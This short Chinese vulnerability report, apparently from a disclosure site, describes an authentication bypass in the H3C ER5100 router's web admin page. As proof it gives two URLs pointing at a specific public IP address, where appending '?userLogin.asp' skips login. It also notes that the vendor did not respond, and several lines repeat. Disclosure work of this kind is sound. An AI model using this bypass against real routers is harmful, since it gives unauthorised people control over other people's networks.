简要描述:
H3C ER5100 企业级宽带路由器web管理页面存在验证漏洞,未经授权的访问者可以修改、重启,查看大部分系统配置,
H3C ER5100 企业级双核宽带路由器 web管理页面存在验证漏洞漏洞预警
。漏洞证明:
http://222.223.5.218:8080/home.asp?userLogin.asp
http://222.223.5.218:8080/wan_NAT.asp?userLogin.asp
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
H3C ER5100 企业级宽带路由器web管理页面存在验证漏洞,未经授权的访问者可以修改、重启,查看大部分系统配置,
http://222.223.5.218:8080/home.asp?userLogin.asp
http://222.223.5.218:8080/wan_NAT.asp?userLogin.asp
未能联系到厂商或者厂商积极拒绝